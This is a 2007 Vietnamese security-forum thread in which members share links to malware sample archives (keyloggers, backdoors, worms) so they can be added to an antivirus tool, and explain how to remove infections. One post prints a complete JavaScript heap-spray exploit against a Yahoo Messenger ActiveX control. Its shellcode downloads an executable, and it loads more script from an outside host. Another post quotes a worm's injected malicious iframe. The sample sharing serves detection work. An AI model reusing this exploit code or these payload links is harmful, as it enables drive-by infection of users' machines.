Nhận mẫu virus - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

Nhận mẫu virus

[Question] Nhận mẫu virus	07/06/2007 10:02:12 (+0700) \| #91 \| 63497

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Một mớ họ hàng của cái con ex-plorer.exe trên kia.
http://www.freefileupload.net/file.php?file=files/060607/1181138395/Maximusseries.rar

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Nhận mẫu virus	07/06/2007 21:36:52 (+0700) \| #92 \| 63554

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Thêm 2 thứ đang lây lan ở VN(SG)
http://www.freefileupload.net/file.php?file=files/070607/1181179921/2emworm.rar

[Question] Nhận mẫu virus	07/06/2007 22:43:02 (+0700) \| #93 \| 63561

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Một vài em VUndo và 1 con downloader
http://www.freefileupload.net/file.php?file=files/070607/1181184088/Vundo.rar

[Question] Nhận mẫu virus	08/06/2007 07:28:12 (+0700) \| #94 \| 63670

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Một vài con họ peeper.
http://www.freefileupload.net/file.php?file=files/070607/1181215568/peeper.rar

http://www.freefileupload.net/file.php?file=files/070607/1181216403/LikeRootkit.rar

[Question] Nhận mẫu virus	09/06/2007 08:12:55 (+0700) \| #95 \| 63871

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

MỘt con backdoor và một con spy trên một máy laptop.
http://www.freefileupload.net/file.php?file=files/080607/1181304595/system32.rar

[Question] Nhận mẫu virus	10/06/2007 05:52:10 (+0700) \| #96 \| 63990

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Một con đã có mặt ở VN và 1 con chưa bị bkav tóm.
http://www.freefileupload.net/file.php?file=files/090607/1181382233/Wulkill.rar

[Question] Re: Nhận mẫu virus	11/06/2007 02:00:32 (+0700) \| #97 \| 64057

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

MỘt gói gồm downloader,keylog,adware dễ dính,backdoor...Nhất là mấy con adware.

http://www.freefileupload.net/file.php?file=files/100607/1181455116/AdwareEXploitDownloader.rar

Hy vọng mod còn đủ kiên nhẫn vì NÓ nhiều lắm.

[Question] Nhận mẫu virus	11/06/2007 10:45:40 (+0700) \| #98 \| 64108

Merc
Member

Joined: 20/07/2004 06:21:59
Messages: 14
Offline

Bác tmd cho em xin pass với smilie

[Question] Re: Nhận mẫu virus	11/06/2007 10:54:37 (+0700) \| #99 \| 64109

KiemKhach
Member

Joined: 12/02/2004 18:10:21
Messages: 24
Offline

Hoàng phân chia công việc rồi share mọi người làm đi. Mình reg một chỗ. smilie

[Question] Nhận mẫu virus	11/06/2007 15:44:48 (+0700) \| #100 \| 64136

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

@Merc: Pass là "infected"
@KiemKhach: hmm... Hoàng sẽ suy nghĩ thêm. Thank bạn

[Question] Nhận mẫu virus	12/06/2007 02:12:27 (+0700) \| #101 \| 64190

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Mod update dòng small, trong mấy cái link có vài mẫu small lụm từ chổ trước. Trong đó còn vài mẫu small nữa. Còn con small.dk báo chí đưa tùm lum chưa thấy mẫu.

[Question] Nhận mẫu virus	12/06/2007 06:29:23 (+0700) \| #102 \| 64246

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Mod coi thử chức năng này. "Metasploit Creator Releases Malware Search Engine"
http://www.eweek.com/article2/0,1895,1990158,00.asp

http://metasploit.com/research/misc/mwsearch/index.html?q=mytob&btnG=Malware+Search

Nếu mod thấy cái reply có gì đó bất ổn, hide luôn.

[Question] Nhận mẫu virus	13/06/2007 01:42:16 (+0700) \| #103 \| 64374

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Đã có mẫu javascript exploit YM , từ Tàu.
hxxp://m.88tw.net/twj.js

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("Love=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 1 * 1 * 60 * 60 * 1000);
document.cookie = "Love=funny;expires=" + expires.toGMTString();
try{
var downf = document.createElement("object");
downf.setAttribute("classid", "clsidCE" + "2F8B1-A5" + "20-11" + "D4-8F" + "D0-00D0" + "B7730277");
var buffer = '\x0a';
downf.server = buffer;
downf.initialize();
downf.send();
document.write("<script language=\"javascript\" Src=http://m.88tw.net/1.js></sc" + "ript>");
}
catch(e)
{
};
}

var target = new ActiveXObject("YWcUpl.WcUpload.1");
var shellcode = unescape("%u9090%u9090%u9090%u9090" +
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
"%u6d2f%u382e%u7438%u2e77%u656e%u2f74%u6873%u776f" +
"%u652e%u6578%u0000");

headersize = 20;
bigblock = unescape("%u9090%u9090");
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<500; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
target.server = buffer;
target.initialize();
target.send();

Mod update 2 cái .js này luôn. Đảm bảo là bà con xài IE sẽ dính, FF không có no script cũng dính chắc.

Cái trang này
hxxp://n.88tw.net/show.htm từ micro trend cung cấp.
Nó tới cái trang này rồi down một em exploit YM . Toàn bộ thông tin của con tào lao ở trang hxxp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS%5FDLOADER%2ENSP

[Question] Nhận mẫu virus	13/06/2007 03:24:37 (+0700) \| #104 \| 64383

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Cái lỗi trên trang của TQ, [FireLion] FastHelper có thể chặn được (và cả các lỗi chưa xuất hiện). tmd xem thêm tại đây:
/hvaonline/posts/list/20/11063.html

[Question] Re: Nhận mẫu virus	14/06/2007 09:17:31 (+0700) \| #105 \| 64576

nazuto
Member

Joined: 13/06/2007 22:00:53
Messages: 1
Offline

Bạn có thể Zip nó lại và gửi mẫu virus vô hòm mail nazuto@yahoo.com . Mình không phải chuyên gia nhưng sẽ hướng dẫn bạn tận tình diệt bằng tay và có thể nói là hầu hết các con virus đều diệt được.

[Question] Nhận mẫu virus	15/06/2007 01:43:21 (+0700) \| #106 \| 64667

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

MỘt phiên bản keylog , hinh như mới ở một số trang web ở VN.
http://www.freefileupload.net/file.php?file=files/140607/1181799677/Winrar.rar
Một gói 3 trong một keylog.
http://www.freefileupload.net/file.php?file=files/140607/1181840946/deep.rar

[Question] Re: Nhận mẫu virus	17/06/2007 07:21:01 (+0700) \| #107 \| 65150

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Malware lung tung thứ
http://w12.easy-share.com/1214353.html

[Question] Nhận mẫu virus	17/06/2007 16:58:36 (+0700) \| #108 \| 65246

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

banhbaonhanthit wrote:

Anh Hoàng giúp em với:
http://www.freefileupload.net/file.php?file=files/060607/1181136271/ex-plorer.rar

Sorry, hôm nay mới thấy bài của bạn.
Bạn có thể dùng phiên bản [FireLion] FastHelper 5.2.8 để diệt con này (được đặt tên là Lina.1/Worm/Win32.
Download bằng 1 trong 2 link sau:
http://fasthelper.fire-lion.com/
hoặc
http://fasthelper.vnsi4h.com

Ngoài ra, bạn có thể dùng AVG http://free.grisoft.com).

[Question] Re: Nhận mẫu virus	18/06/2007 01:00:15 (+0700) \| #109 \| 65291

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Đã lục lại trong trang lần trước một số mẫu có liên quan tới ads,họ perlovga. Mẫu có liên quan tới ADS là con small.kj ,rustok.A,piggi,PE.Dumaru,... nhiều .
[]Dumaru.
This PE virus mails copies of itself to all email addresses it finds in the infected system. It uses Alternate Data Stream (ADS) in infecting all .EXE files in the the root drives of the infected system.
[]

http://www.freefileupload.net/file.php?file=files/170607/1182056023/malware.rar

[Question] Nhận mẫu virus	18/06/2007 03:57:49 (+0700) \| #110 \| 65315

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

thank tmd, Hoàng sẽ check thử.

[Question] Re: Nhận mẫu virus	18/06/2007 09:13:58 (+0700) \| #111 \| 65361

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

THêm 3 con giun, bao gồm Perlovga,autorun,small.apl
http://www.freefileupload.net/file.php?file=files/170607/1182085838/3conGiun.rar

[Question] Nhận mẫu virus	18/06/2007 19:06:06 (+0700) \| #112 \| 65427

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

2 mẫu này đã có ở trên rồi đó tmd, 1 mẫu là AutoRun, 1 là MulDrop.

[Question] Re: Nhận mẫu virus	20/06/2007 17:21:41 (+0700) \| #113 \| 65822

Ghost Ship
Member

Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline

Đây là mẫu trong USB của con biến file .doc thành .exe .Những file .exe này ban đầu là những file .doc trong USB. Con này kô tạo Autorun thì phải. BKAV chưa phát hiện ra con này.

http://www.freewebtown.com/tauma/data/Doc%20thanh%20exe.zip

Kô biết nó ghi đề file mầm của nó lên file .doc hay là chỉ phá file doc thôi. Nếu kô phục hồi được file .doc thì ối người thảm với con này.

[Question] Nhận mẫu virus	20/06/2007 18:01:20 (+0700) \| #114 \| 65824

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Nó tạo ra service có tên là "K Print Spooler" thực thi tập tin "C:\WINDOWS\System32\kspoold.exe":
Code:

HKLM\SYSTEM\CurrentControlSet\Services\kspooldaemon
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KSPOOLDAEMON

Ngoài ra, file Word được copy vào cuối file, may là không có bị mã hóa nên restore cũng đơn giản. Ngoài ra, bạn có thể thực thi tập tin bị nhiễm để trả về lại file word ban đầu

[Question] Nhận mẫu virus	20/06/2007 18:13:59 (+0700) \| #115 \| 65825

Ghost Ship
Member

Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline

LeVuHoang wrote:

Ngoài ra, file Word được copy vào cuối file, may là không có bị mã hóa nên restore cũng đơn giản. Ngoài ra, bạn có thể thực thi tập tin bị nhiễm để trả về lại file word ban đầu

click dúp vô cái file .exe bị biến thành từ file .doc á bác? smilie

[Question] Nhận mẫu virus	21/06/2007 05:14:00 (+0700) \| #116 \| 65927

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Không phải biến, mà khi bạn click vào file .exe, trojan extract file word chứa trong file .exe ra. Hoàng đã xem 2 file word của bạn rồi, chỉ là file luận văn thôi. 1 file là trang bìa, còn 1 file cũng chưa có nội dung gì nhiều. Nếu bạn muốn thì Hoàng có thể up lại 2 file word cho ?

[Question] Re: Nhận mẫu virus	21/06/2007 06:49:50 (+0700) \| #117 \| 65947

Ghost Ship
Member

Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline

Không phải biến, mà khi bạn click vào file .exe, trojan extract file word chứa trong file .exe ra. Hoàng đã xem 2 file word của bạn rồi, chỉ là file luận văn thôi. 1 file là trang bìa, còn 1 file cũng chưa có nội dung gì nhiều. Nếu bạn muốn thì Hoàng có thể up lại 2 file word cho ?

Em extract hết rồi. vậy là mình chỉ cần
killl process kspoold.exe
delete C:\WINDOWS\System32\kspoold.exe
Fix cái dòng

:O23 - Service: K Print Spooler (kspooldaemon) - Unknown owner - C:\WINDOWS\system32\kspoold.exe

là OK phải kô bác smilie

) Em củm ơn bác rất nhiều smilie

)

[Question] Nhận mẫu virus	21/06/2007 19:03:35 (+0700) \| #118 \| 66002

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

GS dùng bản 5.2.9 để có điệt con này (được Hoàng đặt tên là KSpool.1/Trojan/Win32). Chương trình sẽ tự động khôi phục lại file .doc cho bạn.

@tmd: Đã update dòng Dumaru, hỗ trợ ADS Scanning.

[Question] Nhận mẫu virus	21/06/2007 22:17:04 (+0700) \| #119 \| 66027

v4ngh03
Member

Joined: 21/06/2007 11:08:11
Messages: 3
Offline

Hôm qua em vừa được ăn một con W32.WhBoyB.Worm ! em tưởng là Bkav đã diệt hết rồi nào ngờ sáng hôm nay lại quét được 1k5 con nữa ! Không biết có chương trình AV nào khử gọn con này không ạ >_< !

Trong startup của em tự nhiên xuất hiện 1 file gamesetup link dẫn từ C:/MyDocuments and setting\All user\Start menu\Programs\Startup\GameSetup.exe em disable nó rồi nhưng mà no vẫn tự động enable ! không biết có cách nào có thể làm cho file này disable hẳn không ạ !

[Question] Re: Nhận mẫu virus	22/06/2007 06:14:21 (+0700) \| #120 \| 66147

Ghost Ship
Member

Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline

[quote = v4ngh03] Trong startup của em tự nhiên xuất hiện 1 file gamesetup link dẫn từ C:/MyDocuments and setting\All user\Start menu\Programs\Startup\GameSetup.exe em disable nó rồi nhưng mà no vẫn tự động enable ! không biết có cách nào có thể làm cho file này disable hẳn không ạ !

Bạn có thể nói bạn đã disable nó như thế nào kô?

Kô tìm thấy mô tả của BKIS về con WhBoyVB chỉ thấy con WhBoyVA thôi nên có lẽ kô chỉ chỉ cho bạn cách vô hiệu nó bằng tay được. Nhưng nếu nó kô mới so với con A thì vô hiệu cũng dễ thôi.

Bạn thử post hijackthis của máy bạn lên đây mình xem con B nó thế nào.

Sau đây là các hoạt động của con A :

1.File thực thi của nó nằm ở: C:\WINDOWS\system32\drivers\spoclsv.exe

2. Sửa key sau để không xem được file ẩn:
HKLM\...\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

3. Nó tạo key sau trong registry để tự kích hoạt:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svcshare

4. Tạo file:Setup.exe và Autorun.inf vào tất cả các ổ đĩa

5. Nó còn tìm các file .gho để phá <-- mày bựa vừa thôi chứ smilie

(

6. Tìm và lây vào các file có phần mở rộng là "htm", "html", "asp", "aspx", "jsp", "asp", "php" đoạn mã sau để liên kết tới trang web chứa virus
<iframe src="http://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

Bạn có thể diệt nó như sau:

1. Kill Process có tên: spoclsv.exe (nếu kô kill được thì khởi động ở chế độ safe mode )rồi chuyển sang bước 2
2. Vào regedit xóa key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svcshare
3.Tìm đến key sau và sửa value của key CheckedValue thành '1'
HKLM\...\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

3. Mở ẩn System rồi xóa các file setup.exe và Autorun.inf của nó(kô mở các ổ bằng thao tác "click đúp" nếu kô sẽ nhiễm lại ngay) Hoặc là mở Winrar tìm tới các ổ để xóa cũng được đỡ phải mở ẩn system.

4. Nếu máy nối mạng thì tốt nhất là delete hết những file htm, html đã lưu trong máy đi hoặc là mở từng file bằng notepad rồi tìm xóa dòng <iframe src="http://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

Restart máy rùi kiểm tra xem còn process spoclsv.exe đang chạy kô. Nếu hết thì đã diệt thành công còn kô thì đợi luc nào có mô tả về con B mình nói thêm smilie

Hay tốt nhất là up file setup.exe của nó lên cho Bác Hoàng update rùi tải Fast Helper về mà diệt smilie

)

Bác Hoàng à! sao khi kích hoạt file word .exe của con kspoold.exe fast helper kô thông báo là có key của registry được thêm vào?

Go to:

Users currently in here
1 Anonymous